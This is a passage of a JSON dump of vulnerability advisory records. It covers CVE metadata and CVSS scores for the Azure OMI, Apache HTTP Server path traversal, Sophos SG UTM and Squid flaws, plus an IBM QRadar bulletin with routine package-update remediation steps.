{"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-28T01:53:26", "description": "## Summary\n\nIBM QRadar Azure marketplace images include the Open Management Infrastructure RPM which is vulnerable to CVE-2021-38647. Although we do not expose the affected port, we suggest updating out of an abundance of caution.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-38647](<https://vulners.com/cve/CVE-2021-38647>) \n** DESCRIPTION: **Microsoft Azure Open Management Infrastructure could allow a remote attacker to execute arbitrary code on the system. By executing a specially-crafted program, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/208548](<https://exchange.xforce.ibmcloud.com/vulnerabilities/208548>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM QRadar Azure marketplace images 7.3.0 to 7.3.3 Patch 9\n\nIBM QRadar Azure marketplace images 7.4.0 to 7.4.3 Patch 2\n\n \n\n\n## Remediation/Fixes\n \n \n 1. Check your current version of OMI to see if you are affected. All versions of OMI below v1.6.8-1 are affected\n To do this perform the following command:\n yum list all | grep omi\n \n 2. Add Microsoft Software Repository for RHEL 7 Linux Platform:\n sudo yum localinstall <https://packages.microsoft.com/config/rhel/7/packages-microsoft-prod.rpm>\n \n 3. Run yum update command for OMI:\n sudo yum update omi\n \n 4. Disable Microsoft Software Repository after updating the rpm \n sudo sed -i 's/^enabled=1/enabled=0/' /etc/yum.repos.d/microsoft-prod.repo \n \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-30T15:02:10", "type": "ibm", "title": "Security Bulletin: IBM QRadar Azure marketplace images include Open Management Infrastructure RPM, which is vulnerable to Remote Code Execution (CVE-2021-38647)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-30T15:02:10", "id": "1E405D4974F6EA8AB73C7DDA9E9B3B2FCA2359AF05B6CF7C124046402F2BC520", "href": "https://www.ibm.com/support/pages/node/6491159", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Apache HTTP Server Path Traversal Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-41773", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-10T17:26:47", "description": "A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-25T00:00:00", "type": "cisa_kev", "title": "Sophos SG UTM Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25223"], "modified": "2022-03-25T00:00:00", "id": "CISA-KEV-CVE-2020-25223", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Azure Open Management Infrastructure Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Azure Open Management Infrastructure (OMI) Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-38647", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Apache HTTP server vulnerabilities allow an attacker to use a path traversal attack to map URLs to files outside the expected document root and perform Remote Code Execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Apache HTTP Server 2.4.49 and 2.4.50 Path Traversal", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-42013", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2022-10-05T20:51:36", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-07T16:15:00", "type": "osv", "title": "CVE-2021-42013", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-10-05T18:14:00", "id": "OSV:CVE-2021-42013", "href": "https://osv.dev/vulnerability/CVE-2021-42013", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-11-16T00:20:01", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-05T09:15:00", "type": "osv", "title": "CVE-2021-41773", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-11-16T00:19:58", "id": "OSV:CVE-2021-41773", "href": "https://osv.dev/vulnerability/CVE-2021-41773", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-05T05:19:09", "description": "\nSeveral vulnerabilities were discovered in Squid, a proxy caching\nserver.\n\n\n* [CVE-2021-28651](https://security-tracker.debian.org/tracker/CVE-2021-28651)\nDue to a buffer-management bug, it allows a denial of service.\n When resolving a request with the urn: scheme, the parser leaks a\n small amount of memory. However, there is an unspecified attack\n methodology that can easily trigger a large amount of memory\n consumption.\n* [CVE-2021-28652](https://security-tracker.debian.org/tracker/CVE-2021-28652)\nDue to incorrect parser validation, it allows a Denial of Service\n attack against the Cache Manager API. This allows a trusted client\n to trigger memory leaks that. over time, lead to a Denial of\n Service via an unspecified short query string. This attack is\n limited to clients with Cache Manager API access privilege.\n* [CVE-2021-31806](https://security-tracker.debian.org/tracker/CVE-2021-31806)\nDue to a memory-management bug, it is vulnerable to a Denial of\n Service attack (against all clients using the proxy) via HTTP\n Range request processing.\n* [CVE-2021-31807](https://security-tracker.debian.org/tracker/CVE-2021-31807)\nAn integer overflow problem allows a remote server to achieve\n Denial of Service when delivering responses to HTTP Range\n requests. The issue trigger is a header that can be expected to\n exist in HTTP traffic without any malicious intent.\n* [CVE-2021-31808](https://security-tracker.debian.org/tracker/CVE-2021-31808)\nDue to an input-validation bug, it is vulnerable to a Denial of\n Service attack (against all clients using the proxy). A client\n sends an HTTP Range request to trigger this.\n* [CVE-2021-33620](https://security-tracker.debian.org/tracker/CVE-2021-33620)\nRemote servers to cause a denial of service (affecting\n availability to all clients) via an HTTP response. The issue\n trigger is a header that can be expected to exist in HTTP traffic\n without any malicious intent by the server.\n\n\nFor Debian 9 stretch, these problems have been fixed in version\n3.5.23-5+deb9u7.\n\n\nWe recommend that you upgrade your squid3 packages.\n\n\nFor the detailed security status of squid3 please refer to\nits security tracker page at:\n<https://security-tracker.debian.org/tracker/squid3>\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-06-28T00:00:00", "type": "osv", "title": "squid3 - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31806", "CVE-2021-31808", "CVE-2021-28651", "CVE-2021-28652", "CVE-2021-31807", "CVE-2021-33620"], "modified": "2022-08-05T05:19:08", "id": "OSV:DLA-2685-1", "href": "https://osv.dev/vulnerability/DLA-2685-1", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "cve": [{"lastseen": "2023-02-09T14:32:44", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T09:15:00", "type": "cve", "title": "CVE-2021-41773", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-10-28T16:16:00", "cpe": ["cpe:/o:fedoraproject:fedora:34", "cpe:/a:apache:http_server:2.4.49", "cpe:/a:oracle:instantis_enterprisetrack:17.3", "cpe:/a:netapp:cloud_backup:-", "cpe:/a:oracle:instantis_enterprisetrack:17.2", "cpe:/a:oracle:instantis_enterprisetrack:17.1", "cpe:/o:fedoraproject:fedora:35"], "id": "CVE-2021-41773", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-41773", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:oracle:instantis_enterprisetrack:17.3:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:instantis_enterprisetrack:17.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:instantis_enterprisetrack:17.2:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:33:01", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T16:15:00", "type": "cve", "title": "CVE-2021-42013", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-10-05T18:14:00", "cpe": ["cpe:/o:fedoraproject:fedora:34", "cpe:/a:apache:http_server:2.4.49", "cpe:/a:oracle:instantis_enterprisetrack:17.3", "cpe:/a:netapp:cloud_backup:-", "cpe:/a:apache:http_server:2.4.50", "cpe:/a:oracle:instantis_enterprisetrack:17.2", "cpe:/a:oracle:instantis_enterprisetrack:17.1", "cpe:/o:fedoraproject:fedora:35"], "id": "CVE-2021-42013", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-42013", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:oracle:instantis_enterprisetrack:17.3:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.50:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:instantis_enterprisetrack:17.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:http_server:2.4.49:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:instantis_enterprisetrack:17.2:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T15:14:17", "description": "A remote code execution vulnerability exists in the WebAdmin of Sophos SG UTM before v9.705 MR5, v9.607 MR7, and v9.511 MR11", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-25T04:23:00", "type": "cve", "title": "CVE-2020-25223", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25223"], "modified": "2022-10-05T18:28:00", "cpe": ["cpe:/a:sophos:unified_threat_management:9.511", "cpe:/a:sophos:unified_threat_management:9.705", "cpe:/a:sophos:unified_threat_management:9.607"], "id": "CVE-2020-25223", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-25223", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sophos:unified_threat_management:9.511:-:*:*:*:*:*:*", "cpe:2.3:a:sophos:unified_threat_management:9.705:-:*:*:*:*:*:*", "cpe:2.3:a:sophos:unified_threat_management:9.607:-:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:20:49", "description": "An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. An integer overflow problem allows a remote server to achieve Denial of Service when delivering responses to HTTP Range requests. The issue trigger is a header that can be expected to exist in HTTP traffic without any malicious intent.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-08T20:15:00", "type": "cve", "title": "CVE-2021-31807", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31807"], "modified": "2021-09-14T14:31:00", "cpe": ["cpe:/o:fedoraproject:fedora:34", "cpe:/a:netapp:cloud_manager:-", "cpe:/a:squid-cache:squid:2.5.stable5", "cpe:/a:squid-cache:squid:2.5.stable7", "cpe:/a:squid-cache:squid:2.6", "cpe:/a:squid-cache:squid:2.5.stable2", "cpe:/a:squid-cache:squid:2.5.stable3", "cpe:/a:squid-cache:squid:2.5.stable6", "cpe:/a:squid-cache:squid:2.5.stable13", "cpe:/a:squid-cache:squid:2.5.stable14", "cpe:/a:squid-cache:squid:2.7", "cpe:/a:squid-cache:squid:2.5.stable4", "cpe:/a:squid-cache:squid:2.5.stable11", "cpe:/a:squid-cache:squid:2.5.stable12", "cpe:/o:fedoraproject:fedora:33", "cpe:/a:squid-cache:squid:2.5.stable9", "cpe:/a:squid-cache:squid:2.5.stable8", "cpe:/a:squid-cache:squid:2.5.stable10"], "id": "CVE-2021-31807", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31807", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:squid-cache:squid:2.5.stable14:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.6:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.5.stable3:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.7:stable7:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.5.stable8:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.7:stable5:*:*:*:*:*:*", "cpe:2.3:a:netapp:cloud_manager:-:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.5.stable13:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.5.stable5:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.5.stable4:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.5.stable12:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.5.stable6:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.5.stable10:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.7:stable2:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.5.stable2:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.5.stable7:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.7:stable4:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.5.stable11:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.7:stable9:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.7:stable8:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.7:stable6:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.7:-:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.7:stable3:*:*:*:*:*:*", "cpe:2.3:a:squid-cache:squid:2.5.stable9:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:20:50", "description": "An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to a memory-management bug, it is vulnerable to a Denial of Service attack (against all clients using the proxy) via HTTP Range request processing.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-27T13:15:00", "type": "cve", "title": "CVE-2021-31806", "cwe": ["CWE-116"], 